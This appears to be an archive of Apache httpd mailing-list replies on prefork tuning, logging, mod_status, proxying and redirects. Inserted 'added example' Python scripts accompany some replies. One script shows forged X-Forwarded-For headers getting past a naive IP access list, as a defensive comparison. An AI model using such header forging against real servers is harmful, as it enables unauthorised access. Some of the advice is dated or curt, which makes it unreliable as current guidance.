[r...@rhl073 ipv4]# netstat -an | awk '/^tcp/ {A[$(NF)]++} END {for (I in A) {printf "%5d %s\n", A[I], I}}'
34723 TIME_WAIT
    3 CLOSE_WAIT
  275 FIN_WAIT1
   74 FIN_WAIT2
 8824 ESTABLISHED
  815 SYN_RECV
  102 CLOSING
   30 LAST_ACK
   10 LISTEN

In an effort to tune things, I've tried playing with the TCP timeout
settings a bit, and the response times have improved somewhat. Please
note that I've been testing response times using the loopback
interface to rule out any ethernet hardware issues.

echo 15 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle
echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse

We're running prefork, and have configured the client settings to what
seem to be reasonable limits for our hardware.


StartServers         100
MinSpareServers      100
MaxSpareServers      200
ServerLimit         1500
MaxClients          1500
MaxRequestsPerChild  100


   


Forking new children is VERY expensive, compared to the alternatives.

If 1500 concurrent clients is common for your site, consider starting up 
that many as well.

min/maxspare is only meant to handle bursts, not define your normal load.
Your settings mean "accept up to 1500 concurrent connections, but only 
RUN 300 threads when you don't have that many clients"


Since apache will have to fork up to 1200 threads in rapid succession 
when the load spikes, this will cause startup throttling after only a 
few seconds, which is causing your timeouts.


You should change these to AT LEAST 1000 startup, 100 minspare and 200 
maxspare - if 1500 is your actual max load, and not a limit you imposed 
because you think it can't handle more.

It can handle many more, if you have the memory for them.

With 1500 concurrent connections, I would long ago have moved to worker 
combined with proxying dynamic content to a separate prefork instance.
This will optimize memory and resource usage to such an extent that you 
can easily run 5000 clients concurrently.


Worker threads are much more efficient and take far less memory than 
prefork children, therefore they suffer far less from being short-lived 
(due to low maxrequest settings)


Unless the majority of these requests are for dynamic content (they 
rarely are), I predict you can increase performance several fold.


--
J.
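
An added example, not part of the original reply: a Python model of how long prefork needs to fork its way up to 1500 children, using prefork's documented spawn schedule (1, 2, 4, ... up to 32 new children per one-second pass). The load model is an assumption: demand jumps to 1500 concurrent clients at once and each client occupies one child.

```python
MAX_SPAWN_RATE = 32  # prefork forks at most this many children per pass


def spawn_timeline(start, demand, server_limit):
    """Return [(second, children, unserved_clients), ...] until demand is met.

    start        -- children running when the spike arrives
    demand       -- concurrent clients during the spike (assumed constant)
    server_limit -- ServerLimit / MaxClients ceiling
    """
    target = min(demand, server_limit)
    children, rate, second = start, 1, 0
    timeline = []
    while children < target:
        second += 1
        # Every existing child is busy, so the idle count is below
        # MinSpareServers on each pass: the parent forks `rate` children
        # and then doubles the rate, up to the ceiling.
        children += min(rate, server_limit - children)
        rate = min(rate * 2, MAX_SPAWN_RATE)
        timeline.append((second, children, max(demand - children, 0)))
    return timeline


def seconds_to_capacity(start, demand=1500, server_limit=1500):
    """Seconds until `demand` clients can all be served."""
    return len(spawn_timeline(start, demand, server_limit))


if __name__ == "__main__":
    # 200  = MaxSpareServers from the post (most children a quiet server keeps)
    # 1000 = the StartServers value suggested in the reply
    # 1500 = starting every child up front
    for start in (200, 1000, 1500):
        print(f"{start:>5} children at spike -> "
              f"{seconds_to_capacity(start):>2} s until 1500 clients are served")
```

During those seconds new connections wait in the listen backlog, which is consistent with the slow connects and timeouts described in the question.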





Re: [users@httpd] Want more info about logging works

2010-12-02 Thread Jeroen Geilman

On 12/01/2010 07:38 PM, ma...@manfbraun.de wrote:

Hello !

I am just using this to log:

LogFormat \
"%{%F %T}t\t%v\t%p\t%h\t%{User-Agent} ... \
vhost_combined2

CustomLog "|/usr/bin/mono /test/eco.exe /var/log/apache2/extra_log 86400" \
vhost_combined2
   


Okay.


May I use just a named pipe?


You may log to any target the CustomLog documentation says is supported.


  What will happen, if the reader has a short
"dropout", is there a buffer and if not, would apache continue to log
to that pipe later?
   


If the logging process is interrupted for any reason, apache can 
obviously not guarantee logging.



If I use only one [global] logging directive, would all instances
really use this one log?
   


Yes.


Because the timestamp does not contain milliseconds, how can I
determine, which request was the first? Would it help me, just
to subtract the processing-time?
   


Probably not.
Use a logging mechanism that records milli- or microseconds if you need 
that.
The apache log contains the time of *completion* for the entire request, 
not the start time.



It would really help me to understand, how the logging
is really working!
   


It's well documented at http://httpd.apache.org/docs/current/logs.html


--
J.





Re: [users@httpd] Module specific logging not working

2010-12-11 Thread Jeroen Geilman

On 12/10/10 7:25 PM, Dustin Chesterman wrote:



Thanks for the reply.  Adding the *RewriteOptions Inherit* directive
worked perfectly for getting the mod_rewrite logging.  Thanks for
that.  After looking more into the mod_jk logging issue, the logging
is being written but not until I stop the server.  It must be buffered
and would maybe come through eventually if I made enough requests??

Is there anything in tomcat's own server.log or output log ?
Just starting up tomcat produces a shitload of logging (more than 100K).






--
J.





Re: [users@httpd] SetEnv HTTPS on... not working.

2010-12-11 Thread Jeroen Geilman

On 12/10/10 12:55 PM, Mxrgus Pxrt wrote:
I have an SSL offloader, which checks whether the user came using HTTP or 
HTTPS (and sends a header accordingly).


As I want it to be transparent to application and available to 
.htaccess, I use apaches values. I want to overwrite them.


Switching from HTTP to HTTPS cannot be transparent. ever.

--
J.





Re: [users@httpd] Virtual Servers Help

2010-12-20 Thread Jeroen Geilman

On 12/20/10 7:44 PM, Afsar Mohiuddin wrote:
Given the facts. Any other ideas? Is there something that I should be 
trying.




This is a network problem.

Either your internet connection is down often, or somebody incompetent 
manages your network and/or name services.


It's not an apache issue.

You should deploy solid monitoring tools and present evidence to the 
person(s) responsible.


--
J.



Re: [users@httpd] httpd monitoring

2010-12-21 Thread Jeroen Geilman

On 12/21/10 12:42 PM, Hugo Gomes wrote:

Hi all,

I'm managing a web server, and from time to time my machine's load average
goes up, and when I run 'top' I see 1 or 2 httpd processes consuming CPU
and memory.
So my question is: are there any tools with which I can monitor my machine
and find out which scripts on my web server make this happen?

E.g. a tool that checks how much CPU and memory my web pages' scripts are
consuming at time X?



Load and enable mod_status: 
http://httpd.apache.org/docs/2.2/mod/mod_status.html


Set ExtendedStatus On in your global config to see what is consuming 
what, or call it with "/URI?auto" to make the output parsable by scripts 
(there are cacti scripts that graph this data)


--
J.
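
An added example, not part of the original reply: a Python parser for the machine-readable `?auto` output of mod_status that breaks the scoreboard down by worker state, so a script can record what the workers were doing when the load went up. The sample response is constructed.

```python
from collections import Counter

# Scoreboard key as printed by mod_status.
STATES = {
    "_": "waiting", "S": "starting", "R": "reading_request",
    "W": "sending_reply", "K": "keepalive", "D": "dns_lookup",
    "C": "closing", "L": "logging", "G": "graceful_finish",
    "I": "idle_cleanup", ".": "open_slot",
}
# States that count as a busy worker.
BUSY = {"reading_request", "sending_reply", "keepalive", "dns_lookup",
        "closing", "logging", "graceful_finish"}

# Constructed sample of a "?auto" response with ExtendedStatus On.
SAMPLE = """\
Total Accesses: 48213
Total kBytes: 912044
CPULoad: 3.41
Uptime: 86400
ReqPerSec: .558021
BytesPerSec: 10809.4
BytesPerReq: 19371
BusyWorkers: 12
IdleWorkers: 4
Scoreboard: KKKWKK_RKW__K_KW....
"""


def parse_auto(text):
    """Parse the 'Key: value' lines into a dict, converting numbers."""
    status = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        value = value.strip()
        if key == "Scoreboard":
            status[key] = value          # keep the raw state string
            continue
        try:
            # httpd prints fractions below 1 without a leading zero
            status[key] = float(value) if "." in value else int(value)
        except ValueError:
            status[key] = value
    return status


def summarize(text):
    """Count workers per state and cross-check against httpd's own totals."""
    status = parse_auto(text)
    by_state = Counter(STATES.get(ch, "unknown")
                       for ch in status.get("Scoreboard", ""))
    busy = sum(n for state, n in by_state.items() if state in BUSY)
    idle = by_state["waiting"]
    return {
        "busy": busy,
        "idle": idle,
        "open_slots": by_state["open_slot"],
        "by_state": dict(by_state),
        # Share of busy workers that are only holding a keepalive connection.
        "keepalive_share": round(by_state["keepalive"] / busy, 2) if busy else 0.0,
        "matches_counters": (busy == status.get("BusyWorkers")
                             and idle == status.get("IdleWorkers")),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```
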





Re: [users@httpd] Restricting config to a single virtualhost

2010-12-27 Thread Jeroen Geilman

On 12/24/10 5:34 PM, Lorenzo Milesi wrote:

And what's wrong with having the config (included) in the SSL-only
vhost alone?

Because I would need to place those config files elsewhere, which means every 
time I upgrade the package I should take care of remembering where they are and 
update them.
This way they're in place, and aptitude will prompt me for diffs, if it needs 
to.

That's such nonsense.
Package upgrades do not touch files that were modified manually.

--
J.





Re: [users@httpd] Restricting config to a single virtualhost

2010-12-28 Thread Jeroen Geilman

On 12/28/10 11:56 AM, Joost de Heer wrote:

On Mon, December 27, 2010 13:25, Jeroen Geilman wrote:


That's such nonsense.
Package upgrades do not touch files that were modified manually.

But they do recreate files if they're moved to a different location. And
that was what OP was referring to (my suggestion to rename/move the
gitweb.conf file).



I see.
I wouldn't do that, if you want to keep using the package manager.

Just leave the file empty and use a different file.

--
J.





Re: [users@httpd] Re: httpd mod_jk cluster

2010-12-28 Thread Jeroen Geilman

On 12/28/10 3:18 PM, Don Hill wrote:
What I really want to know is there a better design that I should use 
to gain performance. 


Umm.. switch to using mod_proxy_ajp, as the apache documentation suggests ?

It offers a binary interface and much improved speed.


for example

1.) create multiple HTTPD servers, 2 servers per machine. Each serving 
2 tomcats JVM


Why ?
Is your tomcat setup not multithreaded ?

2.) use load balancer in workers to handle the load balance to the 
JVM's. The current configuration is balancing through the vhosts and 
each vhost has a worker for a JVM instance.


That doesn't really make any sense. You can load balance connections, 
but what does "load balance through vhosts" mean ?




On Mon, Dec 27, 2010 at 9:05 PM, Don Hill wrote:


Hi.

I am working on a tomcat 5.5 cluster which is using ajp/1.3 and
mod_jk and trying to determine the best cluster design given the
hardware. I have 2 xeon 2.3 ghz 2 CPU machines with 38GB ram
machine. Currently here is the config I am using. The TOMCAT and
HTTPD servers are on the same physical machine.

Each machine is running HTTPD 1.3 with prefork,



You're joking.
Apache 1.3 is EOL. No longer supported. d-e-d-d DEAD.


the MaxClients is 256 due compiled in limits. Each machine has 4
virtualhosts running through one instance of HTTPD. Two of the
VHOSTS are the same app running on 2 Tomcat 5.5 with 8GB
RAM(configured by customer). The workers are configured to each
VHOST meaning for each machine there are 4 workers defined and one
worker is defined for each VHOST. I will try and depict this
below. The current load balancing is controlled by F5 and manages
the load across 2 machines, 4 VHOST for each app.

Based on this info can someone recommend if this configuration
could be improved and if so what would you recommend ?



Shit yes - replace apache by something from this century. 2.2.17 is current.

Then proceed to learn all about mod_proxy_balancer, which was made for 
this kind of setup.



--
J.



Re: [users@httpd] cannot get UserDir to work

2010-12-30 Thread Jeroen Geilman

On 12/30/10 7:57 PM, Jeff Shearer wrote:

I am not able to successfully implement UserDir in Apache.  I am able to successfully 
reach the DocumentRoot.  However, when I include the user's name following the domain, 
for example, "*.com/wendellmoore," I receive a 404 error.  Following is some 
information that should prove useful in understanding my environment.




# cat /usr/local/etc/apache22/Includes/users.txt>>  userdir.txt

   UserDir disabled
   UserDir enabled wendellmoore
   UserDir /disk2/*/public>




Is this block active in the context of the host you requested ?

Show the output of httpd -S, and the exact URL you requested.

--
J.





Re: [users@httpd] [SOLVED] Re: egrep: /etc/bind/rndc.key: Permission denied

2010-12-31 Thread Jeroen Geilman

On 12/31/10 6:16 AM, Michelle Konzack wrote:

After a second sleepless night I have found the egrep pig.

On my VServers I generate a list for Hosts which are on the appropriated
VServer.  I do this by

   exec("egrep --no-filename --regexp=\"(ORIGIN|CNAME.*" . $VServer[0] ."\.)\" 
/etc/bind/*", $LIST);

and it automatically hit /etc/bind/rndc.key which is not a zone file.

This has changed now, since I make a direct SSH call to my NameServers.

Thanks, Greetings and nice Day/Evening
 Michelle Konzack



What do you think BIND has to do with apache HTTPD ?


--
J.





Re: [users@httpd] ssl over https with ubuntu server 10.04

2011-01-15 Thread Jeroen Geilman

On 1/15/11 11:02 PM, Teun wrote:

Hi everybody,

I did follow a wiki to enable a secure ssl connection with my https://server/


How about the actual documentation: 
http://httpd.apache.org/docs/current/ssl/



But there is still a problem. Can you help me to analyse the problem?


Not without any information whatsoever, no.


I did open my port 443 on my router. I am not a beginner and not a
high-end user. Just normal.  So there is nothing wrong with what I did.


That's an unwarranted assumption on your part.

And as far as apache goes, you obviously are a beginner (not that that 
is a bad thing)



But
let's begin to analyse, please?


...how ?


--
J.





Re: [users@httpd] Log entries

2011-01-15 Thread Jeroen Geilman

On 1/14/11 9:31 AM, Jørn wrote:

Hello,

This may be a bit off-topic but...

During the last months I have noticed this kind of entries in the apache log
file:

84.48.198.105 - - [09/Jan/2011:12:41:24 +0100]
"GET 
/dahls/Vin/url(res://C:/Programfiler/Google/Google%20Toolbar/Component/GoogleToolbarDynamic_mui_en_E11712C84EA7E12B.dll/
findy_buttons.png) HTTP/1.1" 404 333

217.144.240.150 - - [14/Jan/2011:09:24:39 +0100]
"GET 
/dahls/Nofaq/Trening/url(data:image/png;base64,iVBORw0KGgoNSUhEUgAAADgOCAYAAAB6pd%2buAXNSR0IArs4c6QZiS0dEAP8A%2fwD%2foL2nkwlwSFlzAAALEwAACxMBAJqcGAd0SU1FB9oGAhENK17O5ogZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAD6UlEQVRIx82WXWxTdRjGf6fndO3adbZ0VLoP9gFMXZQFNgSWDEkEYtSQkNVg4o2JH9NGJTMk6k01vTIhXshFzTCKE5NFORoXXDBs4nTMZHMzSETHDKyQyb7Xbu36dc7p8aaQZm5GNzd8rk7evOf%2fz%2fM%2bz%2f99X4E1htcn68v5742mffVRJd19uucqH539lSq3yKuHtlDmkPj99aPYe39kfRoMOqgCJHSdJNRL3AEE%2fB7h3xZFgO6JuRQdl6PE8zfRPzlF71CEojoXFc%2b9SPy3KxjCc%2bgCpIE0IilB65YWHFQBfAbUZEIDQGPA7xngDsNgMpFUY0Q0ESHHhKbkM3A9yoFqDceGQpTijWjhXxCAtC6gCWk0BAwLzqkAQsC6TJVDGcKrZdeDXp%2fcvki8zeuTH8uO6ehYzRJumxEUBUkyMa%2baUDWBVDLNnJJgNE9ixGZiOlckaQAVAWmBdTqBzqxQJ%2fD2KgrTCDzq9clywO%2fxZMi1AgcBBbhNPhyJ47TlsGuzjaHRSRRdoKq8AF3XOdvZw1BMQneUMl9iZN4eo3AmRWVwFulvqusAngBOryLBY0AcaPD65LeAFPAk0BLwe57OTnz3i4sc3ruFx2s24MwzoWgaW4tNnPn0JLt37KJ2zwGMgk5X3zd8ONJOX7mGvcK5OEGvT94HNGcs2rjSzrhUUwn4PV1AV4bcm5nwkYDfc3xhbs%2bVWQZH%2btlekc%2fDtRupKrub1uYT7NhWw9bde%2fl2REUSRR56pJT0lxofhM8xaheXVPA1oDPg9zT%2bExmsDqF8hUqmlvi%2bDUs6RWhW5Ov%2bKaxmK5XFLkIzIe7f%2fiBtwypPVZqIRWJ8Ny6x09OEJJs5rrTxn4yJY00NwRU0mtaMLY9kyL3n9clVAb%2fnley8wnyBkkIHrgILm925JGPTJONRDHqaHDQmx2a4Ph4hpFkpcZqZmBhHtbI4wYDfs3%2bNhn5bpqG03LKl1ydXAS97fXJ%2b9jv0Hq6lyK5C%2fBJ6PEjyj2nW2VQGLw5gLKqn92YSxWgjbrRy89ogVosFoyT%2bZUzcurjD65M71oDjCeDzbCIZ5VqAk9mJm9w5zAdPkRx%2bB3H6Y3Kj7TxQMkzLqfe5V71GvttFiduOa3aQc58E6JseJJXSEVhjeH2yvpxN5qVnygj%2fdJQCWxjBAOm0gVRC5MLPdoZnt2F3rsdisTAV7MBlusT3oVK6TOriCv4fIZnsSDlu1IQRNWVGV83kYKFuZzX7PQ1MFOg0j53nh%2bg8qpLg2eogeyJ53JFddDkLtyiZ6%2b%2b674Vu5cZXiIkJdAEMjnvIqzjEjVCS7rmrhOwC0Vwn58fqkIIXeL72Mn8CJn6UfKGeNt4ASUVORK5CYII%3d)
HTTP/1.1" 404 1801

I wonder what is causing this?


A client is requesting these URLs.


  Seem to be some kind of badly configured
"google feature" on the client side, or?



Yes, probably.



--
J.
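
An added example, not from the thread: a Python triage pass over access-log lines that picks out requests where a CSS `url(...)` value with its own scheme (such as the `res:` and `data:` ones quoted above) ended up inside the request path, and groups them by the directory the browser resolved them against. The log lines are constructed from the shape of the two entries in the post, with documentation addresses and shortened payloads.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format prefix: host, ident, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# "url(<scheme>:" as a path segment: the client treated the text of a CSS
# url(...) value as a relative link and asked the server for it.
CSS_URL_RE = re.compile(r'/url\((?P<scheme>[a-z][a-z0-9+.-]*):', re.I)

# Constructed sample lines (addresses from the documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2011:12:41:24 +0100] "GET /dahls/Vin/url(res://C:/'
    'Programfiler/Google/Google%20Toolbar/Component/Example.dll/'
    'findy_buttons.png) HTTP/1.1" 404 333',
    '192.0.2.10 - - [09/Jan/2011:12:41:25 +0100] "GET /dahls/Vin/ HTTP/1.1" 200 5120',
    '198.51.100.23 - - [14/Jan/2011:09:24:39 +0100] "GET /dahls/Nofaq/Trening/'
    'url(data:image/png;base64,AAAA%2fBBBB%3d) HTTP/1.1" 404 1801',
    '203.0.113.5 - - [14/Jan/2011:09:30:00 +0100] "GET /missing.html HTTP/1.1" 404 209',
]


def find_css_url_requests(lines):
    """Return one dict per request whose path embeds a CSS url(scheme:...)."""
    hits = []
    for line in lines:
        entry = LOG_RE.match(line)
        if not entry:
            continue                      # not a request line we understand
        path = unquote(entry.group("path"))
        found = CSS_URL_RE.search(path)
        if not found:
            continue
        hits.append({
            "host": entry.group("host"),
            "scheme": found.group("scheme").lower(),
            # Directory the broken reference was resolved against, i.e. the
            # page that was open in the client when it made the request.
            "base": path[:found.start() + 1],
            "status": int(entry.group("status")),
        })
    return hits


def schemes_by_base(hits):
    """Group the embedded schemes by the page directory they appeared under."""
    grouped = defaultdict(set)
    for hit in hits:
        grouped[hit["base"]].add(hit["scheme"])
    return {base: sorted(schemes) for base, schemes in grouped.items()}


if __name__ == "__main__":
    for base, schemes in schemes_by_base(find_css_url_requests(SAMPLE_LOG)).items():
        print(f"{base}: url() with scheme(s) {', '.join(schemes)}")
```

Requests flagged this way can be counted separately from other 404s, so they do not drown out missing-file errors that do need attention.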






Re: [users@httpd] webservice clustering trouble

2011-01-15 Thread Jeroen Geilman

On 1/14/11 5:29 PM, Lukas Sklenar wrote:

Hello,

I have deployed 3 tomcat6.0.29 webapps, each of which exposes a
webservice, and am using apache2.2 and mod_jk-1.2.31-httpd-2.2.3.so to
cluster them - a performance exercise.


2.2.3 is quite old.

Also, mod_jk is deprecated in favour of mod_proxy_ajp.




I am ready to post my config if need be, but wanted to know if someone
has come across this before?


Your apache httpd config, if relevant to the issue, is welcome.


I can find some reference in the archives which suggests I should update
tomcat/apache/java etc but I have the latest versions already.


No you don't. Apache httpd is at least 14 versions behind.


This message should be regarded as confidential.


Not really.


If you have received this email in error


You tell me.


  please notify the sender and destroy it immediately.


Will do!

Idiot disclaimers.

--
J.





Re: [users@httpd] webservice clustering trouble

2011-01-16 Thread Jeroen Geilman

On 1/16/11 12:30 AM, Joost de Heer wrote:

On 01/16/2011 12:19 AM, Jeroen Geilman wrote:

On 1/14/11 5:29 PM, Lukas Sklenar wrote:

Hello,

I have deployed 3 tomcat6.0.29 webapps, each of which exposes a
webservice, and am using apache2.2 and mod_jk-1.2.31-httpd-2.2.3.so to
cluster them - a performance exercise.


2.2.3 is quite old.


2.2.3 is the version that RHEL 5 ships. Redhat patches most of the 
stuff released in a later version but keeps the version at 2.2.3.


For FOURTEEN versions ?

That sounds idiotic on the face of it.

--
J.





Re: [users@httpd] http reference link

2011-01-19 Thread Jeroen Geilman

On 1/19/11 11:07 PM, George Christidis wrote:

Hi, I have a question about the link google references for my website on search 
results. It appears as www.website.com\main_dir\?q=shab100500


That is very unlikely, as it is not a valid URL.
It is probably listed as www.website.com/main_dir/?q=shab100500


Not sure if this is coming from an apache setting or google itself or the php 
code.


It's a valid URL with a query string.


  I don't know what it means. I am still learning apache, so for now I have my 
site on a web host. My host recently migrated my data to a new server so they 
might have changed something in apache?


If this did not use to happen, they may have made htaccess rewrite 
changes; ask them what they did.


It is not a problem, as it is a valid URL.


--
J.





Re: [users@httpd] Apache Reverse Proxy

2011-01-19 Thread Jeroen Geilman

On 1/18/11 10:29 PM, Christian Pascher wrote:

Hi,

I have a topology with two apache webservers. I want to set up a new 
server as a reverse proxy with caching and load balancing.


mod_proxy_balancer will do nicely.

As far as I know, this works fine with apache and I don't need extra 
software like squid. Am I right?


It depends on your requirements, really.

If you need esoteric things like (external) proxy authentication or 
fine-grained client ACLs, squid is better equipped for that.


As an application frontend loadbalancer, apache works very well.


--
J.





Re: [users@httpd] Apache Reverse Proxy

2011-01-21 Thread Jeroen Geilman

On 1/21/11 12:51 PM, Christian Pascher wrote:
So, if I want to provide HTTPS connections, it is possible to use a 
Apache Server as loadbalancer?


It's always nice to get new requirements after the fact.

You did not specify HTTPS before, did you ?

AFAIK mod_proxy will handle both http-to-https and https-to-http just fine.


And how do I configure that?


The way the documentation tells you to.

http://httpd.apache.org/docs/current/mod/mod_proxy_balancer.html


--
J.





Re: [users@httpd] Redirect to the diff. servers.

2011-01-23 Thread Jeroen Geilman

On 1/23/11 6:46 PM, Tushar Chavan wrote:

Hi Experts,

We have below requirement.

There are two portal servers . Portal 1 --> with url 
http://epsrm.xyz.com:5/irj & Portal 2 ---> with 
https://srmprd.xyz.com:5/irj


Apache server is srmarp.

Now can we redirect traffic from apache to  Portal 1 & Portal 2 from 
same Apache host.


I can use

ProxyPass        /irj http://epsrm.xyz.com:5/irj
ProxyPassReverse /irj http://epsrm.xyz.com:5/irj


what about other?



Other what ?

Plane of existence ?

--
J.



Re: [users@httpd] Password Protection Ignored

2011-01-23 Thread Jeroen Geilman

On 1/22/11 1:45 PM, --[ UxBoD ]-- wrote:

Hi,

I have a reports directory I wish to secure and have created the necessary 
.htaccess file:


Don't.
Just use the configuration file if you have access to it.

It will make life so much easier.



--
J.





Re: [users@httpd] Password Protection Ignored

2011-01-24 Thread Jeroen Geilman

On 1/24/11 9:38 AM, --[ UxBoD ]-- wrote:


- Original Message -

On 1/22/11 1:45 PM, --[ UxBoD ]-- wrote:

Hi,

I have a reports directory I wish to secure and have created the
necessary .htaccess file:

Don't.
Just use the configuration file if you have access to it.

It will make life so much easier.



--
J.



I have tried as well adding it directly to httpd-vhosts.conf and get the same 
result :( Here is the virtual host entry if anybody can see what I have done 
wrong :(


Include logs from accesses so we can see what happens.
Also check if global or htaccess-based rewriting is going on anywhere.

--
J.





Re: [users@httpd] cleanest/fastest way of redirecting aliases to canonical server names

2011-01-29 Thread Jeroen Geilman

On 1/29/11 2:38 AM, Christoph Anton Mitterer wrote:

Hi.

I'm having a vhost, which is reachable via one canonical name, e.g.
example.org, and also via several aliases, e.g. www.example.org,
example.com, etc.

I want that whenever requests are made via one of the aliases, that
those are redirected to the canonical name.


IMHO there are about the following two ways:
1)
- one vhost, which has the canonical name as ServerName, and the aliases
as ServerAliases
- and also has some RewriteCond+RewriteRules, making a redirect to the
canonical address if HTTP_HOST is one of the aliases.


This is generally the right way only if you have a hosted account, i.e. 
you only have access to one vhost period.

If you have control over httpd.conf, avoid rewriting as much as possible.


2)
- two vhosts, the first having only the canonical name as ServerName (no
ServerAlias)

- the second, having the aliases as ServerName/ServerAliases
- and also doing a Redirect / http://example.org


That would be my choice.


Can (2) be handled with more performance by Apache than (1) (as it
doesn't have to evaluate the RewriteConds and the regexps every time?


That's quite irrelevant, as the redirect requires an entire network 
round-trip, not to mention any client-side processing.


Rewrite performance is insignificant compared to the overhead of a 
network round-trip.


However, the Redirect forces the network round-trip regardless, so it's 
a moot point.



At least (1) seems to be cleaner readable to me (from a config file
point of view)



No, it's not cleaner at all. Using Rewrites funges your output and makes 
troubleshooting harder.



--
J.





Re: [users@httpd] problem with extra numbers after %h hostname/ip address in access_log

2011-01-29 Thread Jeroen Geilman

On 1/28/11 5:25 PM, Randy Tejas wrote:

Hello,

I'm seeing a problem in my logs where there are extra numbers at the 
end of an ip address:


10.56.194.252194.252
10.56.195.63.195.63

Apache seems to be duplicating the last two octets. Anybody seen this 
before and how to fix?


Server version: Apache/2.0.63
Server built:   Oct 24 2010 13:42:01

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined


This is where it began (Jan 10):
10.79.24.178 - - [09/Dec/2010:20:40:20 -0600] "GET /everest/ HTTP/1.1" 200 98011
10.56.194.252194.252 - - [10/Jan/2011:16:57:37 -0600] "GET /images/search/ac_collection_12x15.png HTTP/1.1" 404 316
10.56.194.252194.252 - - [10/Jan/2011:16:57:37 -0600] "GET /images/search/ac_pub_15x15.png HTTP/1.1" 404 309

Thanks!



If you look at the above log, it only happens on 404s.
Are you redirecting ErrorDocuments somewhere ?

--
J.



Re: [users@httpd] cleanest/fastest way of redirecting aliases to canonical server names

2011-01-29 Thread Jeroen Geilman

On 1/29/11 12:49 PM, Joost de Heer wrote:



2)
- two vhosts, the first having only the canonical name as ServerName (no
ServerAlias)


3)
Two vhosts, the first having a bogus servername (e.g. 'redirecthost'), 
in which you do the redirection, and the second, which has the 
canonical name.




What happens when he wants to use this mechanism for multiple sets of 
canonical names and aliases ?


--
J.





Re: [users@httpd] Incompatibilities between mod_remoteip and the server-info & server-status handlers?

2011-01-29 Thread Jeroen Geilman

On 1/28/11 6:27 PM, J.Lance Wilkinson wrote:
I've got a set of identical webservers, all Apache 2.2.6, with 
configurations such that authorized IP addresses are allowed access to 
locations handled by the server-info and server-status handlers.


These work fine when visiting the individual servers.

Now I put a load balancer in front of them all, and incorporate the 
mod_remoteip module into them to accept the load balancer inserted 
X-Forwarded-For header as the actual requesting IP address.




Meaning the load "balancer" has to do double work because unacceptable 
IPs are not blocked at the front gate. That's weird.


Users from acceptable IP addresses coming in through the load balancer 
get either a 404, a 403 or a blank page (and the error log shows an 
aborting child process in that case).




Put an apache load balancer in front and move the access lists to that 
server.



If there's a basic incompatibility between these handlers and 
mod_remoteip, like for example, maybe they do their thing BEFORE 
mod_remoteip appears in the processing stack, I'll accept that.   
After all, the main reason I want to do it from the load balancer is 
to just see which server is being handed any arbitrary request; it's a 
trivial thing.




Put an apache load balancer in front and move the access lists to that 
server.



But if it SHOULD be working I'd like to know what I'm doing wrong.




--
J.
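
An added illustration for the thread above (not code from mod_remoteip or from either poster): a simplified Python model of how an IP access list behaves once the client address is taken from X-Forwarded-For, comparing a left-most-entry lookup with a right-to-left walk that only believes hops listed as trusted proxies. All addresses, networks and function names are constructed assumptions.

```python
import ipaddress

def _entries(xff):
    """Split an X-Forwarded-For value into its comma-separated entries."""
    return [e.strip() for e in (xff or "").split(",") if e.strip()]

def _in_any(ip, networks):
    """True if ip parses as an address and falls inside one of the networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(n) for n in networks)

def naive_client_ip(peer_ip, xff):
    """Weak form: believe the left-most entry, whoever sent the header."""
    entries = _entries(xff)
    return entries[0] if entries else peer_ip

def resolve_client_ip(peer_ip, xff, trusted_proxies):
    """Hardened form: start from the TCP peer and step one entry to the left
    only while the hop that vouches for that entry is a trusted proxy."""
    current = peer_ip
    entries = _entries(xff)
    while entries and _in_any(current, trusted_proxies):
        candidate = entries.pop()          # right-most remaining entry
        try:
            ipaddress.ip_address(candidate)
        except ValueError:
            break                          # garbage entry: stop, keep current
        current = candidate
    return current

def status_page_allowed(client_ip, allowed_networks):
    """The access list guarding the status page (hypothetical helper)."""
    return _in_any(client_ip, allowed_networks)

# Constructed scenario: one load balancer, one admin network.
TRUSTED_PROXIES = ["10.0.0.5/32"]          # the load balancer (assumed address)
ALLOWED = ["192.0.2.0/24"]                 # admin network (assumed)

CASES = {
    # name: (TCP peer seen by the backend, X-Forwarded-For as received)
    "admin via balancer": ("10.0.0.5", "192.0.2.10"),
    # outside client sent its own XFF; the balancer appended the real address
    "forged header via balancer": ("10.0.0.5", "192.0.2.10, 203.0.113.50"),
    # outside client reaches a backend directly, bypassing the balancer
    "forged header, direct": ("203.0.113.50", "192.0.2.10"),
}

def evaluate():
    """Return {case: (naive_allowed, hardened_allowed)} for the cases above."""
    results = {}
    for name, (peer, xff) in CASES.items():
        naive = status_page_allowed(naive_client_ip(peer, xff), ALLOWED)
        hardened = status_page_allowed(
            resolve_client_ip(peer, xff, TRUSTED_PROXIES), ALLOWED)
        results[name] = (naive, hardened)
    return results

if __name__ == "__main__":
    for name, (naive, hardened) in evaluate().items():
        print(f"{name:28s} naive={naive!s:5s} hardened={hardened}")
```
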





Re: [users@httpd] mod_dir with HTTPS

2011-01-29 Thread Jeroen Geilman

On 1/28/11 4:02 AM, Tao Lei wrote:

Hello.

It seems that mod_dir does not work properly with SSL (https).

When working with http, there is no problem:
If url "http://www.abc.com/test" is requested, apache appends a "/" to the url and then 
responds to browser with code 301, telling it to request the newly-modified url 
"http://www.abc.com/test/".

However, with https, things are not going as expected:
If url "https://www.abc.com/test" is requested, the new url returned by apache is 
"http://www.abc.com/test/", but not "https://...",


Then there are redirects or rewrites happening that you haven't 
discovered or admitted to.




--
J.





Re: [users@httpd] One Apache for three diff. websites

2011-02-01 Thread Jeroen Geilman

On 2/1/11 8:54 AM, Tushar Chavan wrote:

Hi Joost,

1> First point I tried but it did not work. Also you are correct  , 
this is SAP system.


